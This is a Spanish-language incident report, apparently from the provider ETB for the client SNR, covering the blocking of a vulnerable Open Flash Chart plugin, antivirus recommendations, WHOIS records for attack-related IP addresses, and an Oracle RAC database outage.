De acuerdo a las validaciones realizadas y ya que se cuenta con la última versión del complemento Open
Flash Chart, se realizo el bloqueo de este subsanando la vulnerabilidad presentada y se procede a realizar
la búsqueda de un parche de seguridad que blinde a dicho componente.
Se recomienda a SNR la implementación de un control de acceso y subida de información al portal web
por parte de sus Gestores con el fin de contar con un histórico de todos estos archivos permitiendo con
esto la instalación de un software antivirus, (se realizaron pruebas con el antivirus ClamAV logrando la
detección y erradicación de archivos maliciosos), el cual escaneara cada hora los archivos creados en esta
para que en caso de explotarse una vulnerabilidad y que el atacante suba un archivo malicioso al servidor,
este pueda ser detectado y notificado, y de esta manera se puedan tomar acciones de manera inmediata.
1. ANEXO 1. INFORMACIÓN DE LAS DIRECCIONES IP RELACIONADAS CON EL ATAQUE
118.97.212.185
% APNIC found the following authoritative answer from: whois.apnic.net
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
% Information related to '118.97.208.0 - 118.97.223.255'
inetnum: 118.97.208.0 - 118.97.223.255
netname: TLKM_NAS_AST_CUSTOMER
country: ID
descr: PT TELKOM INDONESIA
descr: Menara Multimedia Lt. 7
descr: Jl. Kebonsirih No.12
descr: JAKARTA
admin-c: AR165-AP

13. Bogotá, Colombia Ver 4.0 04-08
GARS
tech-c: HM444-AP
status: ASSIGNED NON-PORTABLE
mnt-by: MAINT-TELKOMNET
mnt-irt: IRT-IDTELKOM-ID
changed: hostmaster@telkom.net.id 20101202
source: APNIC
irt: IRT-IDTELKOM-ID
address: PT. TELKOM INDONESIA
address: Menara Multimedia Lt. 7
address: Jl. Kebon sirih No.12
address: JAKARTA
e-mail: abuse@telkom.net.id
abuse-mailbox: abuse@telkom.net.id
admin-c: DF99-AP
tech-c: AR165-AP
mnt-by: MAINT-TELKOMNET
changed: abuse@telkom.net.id 20120420
changed: hm-changed@apnic.net 20120420
source: APNIC
role: PT Telkom Indonesia APNIC Resources Management
address: PT. TELKOM INDONESIA
address: Menara Multimedia Lt. 7
address: Jl. Kebonsirih No.12
address: JAKARTA
country: ID
phone: +62-21-3860500
fax-no: +62-21-3861215

14. Bogotá, Colombia Ver 4.0 04-08
GARS
e-mail: ip-admin@telkom.net.id
admin-c: HM444-AP
tech-c: HM444-AP
nic-hdl: AR165-AP
notify: hostmaster@telkom.net.id
mnt-by: MAINT-TELKOMNET
changed: hostmaster@telkom.net.id 20060105
source: APNIC
person: PT Telkom Indonesia Hostmaster
nic-hdl: HM444-AP
e-mail: hostmaster@telkom.net.id
address: PT. TELKOM INDONESIA
address: Menara Multimedia Lt. 7
address: Jl. Kebonsirih No.12
address: JAKARTA
phone: +62-21-3860500
fax-no: +62-21-3861215
country: ID
notify: hostmaster@telkom.net.id
mnt-by: MAINT-TELKOMNET
changed: hostmaster@telkom.net.id 20060105
source: APNIC
% Information related to '118.97.208.0/20AS17974'
route: 118.97.208.0/20
descr: PT. TELKOM INDONESIA
descr: Menara Multimedia Lt. 7
descr: Jln. Kebonsirih No.12

15. Bogotá, Colombia Ver 4.0 04-08
GARS
descr: JAKARTA
country: ID
origin: AS17974
mnt-by: MAINT-TELKOMNET
changed: hostmaster@telkom.net.id 20130612
source: APNIC
% This query was served by the APNIC Whois Service version 1.68 (UNDEFINED)
77.245.151.239
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '77.245.144.0 - 77.245.159.255'
inetnum: 77.245.144.0 - 77.245.159.255
netname: TR-NIOBE-20070427
descr: Niobe Bilisim Teknolojileri Yazilim San. Tic. Ltd. Sti.
country: US
org: ORG-NB14-RIPE
admin-c: CY77-RIPE
tech-c: FB3777-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: NIOBE-MNT
mnt-routes: NIOBE-MNT
source: RIPE #Filtered
organisation: ORG-NB14-RIPE
org-name: Niobe Bilisim Teknolojileri Yazilim San. Tic. Ltd. Sti.
org-type: LIR
phone: +13022950953

16. Bogotá, Colombia Ver 4.0 04-08
GARS
fax-no: +13022950953
admin-c: CY77-RIPE
admin-c: FB3777-RIPE
mnt-ref: NIOBE-MNT
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
source: RIPE #Filtered
address: Niobe Hosting LLC
address: Fatih BIBEROGLU
address: 501 Silverside Road ste 105
address: 19809 Wilmington DE
address: UNITED STATES
person: Cuneyt Yagiz
org: ORG-NB14-RIPE
address: 501 Silverside Road ste 105
address: Wilmington DE 19809
address: USA
mnt-by: NIOBE-MNT
phone: +1-3022950953
remarks: ###################################
remarks: Abuse & intrusion reports should
remarks: be sent to: abuse@nw.com.tr
remarks: ###################################
nic-hdl: CY77-RIPE
source: RIPE #Filtered
person: Fatih BIBEROGLU
org: ORG-NB14-RIPE
address: 501 Silverside Rd Ste 105
address: Wilmington DE 19809 USA
mnt-by: NIOBE-MNT
phone: +1 302-2950953
remarks: ###################################
remarks: Abuse and intrusion reports should
remarks: be sent to: abuse@nw.com.tr
remarks: ###################################
nic-hdl: FB3777-RIPE
source: RIPE #Filtered
% Information related to '77.245.144.0/20AS42868'
route: 77.245.144.0/20
descr: CMBM
origin: AS42868
mnt-by: NIOBE-MNT

17. Bogotá, Colombia Ver 4.0 04-08
GARS
source: RIPE #Filtered
% This query was served by the RIPE Database Query Service version 1.68.1 (WHOIS3)
91.221.0.124
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '91.221.0.0 - 91.221.1.255'
inetnum: 91.221.0.0 - 91.221.1.255
netname: E-MORDOVIA
descr: SUE of RM "SPC of Informatization and New Technologies"
country: RU
org: ORG-SIaN1-RIPE
admin-c: AI1814-RIPE
tech-c: AI1814-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-lower: RIPE-NCC-END-MNT
mnt-by: MNT-INTRM
mnt-routes: MNT-INTRM
mnt-domains: MNT-INTRM
source: RIPE #Filtered
organisation: ORG-SIaN1-RIPE
org-name: SUE of RM "SPC of Informatization and New Technologies"
org-type: OTHER
address: Communist str. 13
address: Saransk, 430000, Russia
mnt-ref: MNT-INTRM
mnt-by: MNT-INTRM
source: RIPE #Filtered

18. Bogotá, Colombia Ver 4.0 04-08
GARS
person: Alexander Ilyin
address: Communist str. 33
address: Saransk, Russia
phone: +7 8342 242276
nic-hdl: AI1814-RIPE
source: RIPE #Filtered
% Information related to '91.221.0.0/23AS51635'
route: 91.221.0.0/23
descr: route object
origin: AS51635
mnt-by: MNT-INTRM
source: RIPE #Filtered
% This query was served by the RIPE Database Query Service version 1.68.1 (WHOIS3)
188.40.17.97
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '188.40.17.97 - 188.40.17.97'
% Abuse contact for '188.40.17.97 - 188.40.17.97' is 'abuse@hetzner.de'
inetnum: 188.40.17.97 - 188.40.17.97
netname: GOBIT-SRL
descr: Gobit S.r.l.
country: DE
admin-c: EP4807-RIPE
tech-c: EP4807-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
source: RIPE #Filtered

19. Bogotá, Colombia Ver 4.0 04-08
GARS
person: Enrica Paoletti
address: Gobit S.r.l.
address: V.le Lombardia n.30
address: 53042 Chianciano Terme (Siena)
address: ITALY
phone: +39057863007
fax-no: +39057863007
nic-hdl: EP4807-RIPE
mnt-by: HOS-GUN
source: RIPE #Filtered
% Information related to '188.40.0.0/16AS24940'
route: 188.40.0.0/16
descr: HETZNER-RZ-FKS-BLK1
origin: AS24940
org: ORG-HOA1-RIPE
mnt-by: HOS-GUN
source: RIPE #Filtered
organisation: ORG-HOA1-RIPE
org-name: Hetzner Online AG
org-type: LIR
address: Hetzner Online AG
address: Attn. Martin Hetzner
address: Stuttgarter Str. 1
address: 91710
address: Gunzenhausen
address: GERMANY
phone: +49 9831 610061
fax-no: +49 9831 610062
admin-c: TF2013-RIPE
admin-c: MF1400-RIPE
admin-c: GM834-RIPE
admin-c: HOAC1-RIPE
admin-c: MH375-RIPE
admin-c: SK8441-RIPE
admin-c: SK2374-RIPE
mnt-ref: HOS-GUN
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
abuse-c: HOAC1-RIPE
source: RIPE #Filtered

20. Bogotá, Colombia Ver 4.0 04-08
GARS
% This query was served by the RIPE Database Query Service version 1.68.1 (WHOIS3)
Se realizaron depuraciones debido a los bloqueos y encolamiento generado por los procesos mencionados, luego de esto
fue necesario realizar labores adicionales sobre el nodo 2 con el fin de solucionar el inconveniente presentado y que no
permitía recibir sesiones de la aplicaciones, luego de ser solucionado el aplicativo funciono correctamente.
ACCIONES DE MEJORA
Es necesario realizar pruebas en ambiente controlado con el soporte de los fabricantes ya que se detecto que al
presentarse un evento sobre alguno de los tres nodos de Base de Datos que impacte su funcionamiento normal se
presenta desconexión total de la aplicación presentándose afectación total del servicio, lo cual no es un comportamiento
normal ya que se cuenta con un RAC de Oracle.
Estado Actual: Resuelto
Evento Atendido por: ETB - INTEK
VoBo Ingeniero: Luis E. Muñoz.
Disponibilidad:
En la Cultura ETB, ¡Entendemos las necesidades de nuestros clientes y les ofrecemos soluciones integrales,
buscando relaciones de largo plazo!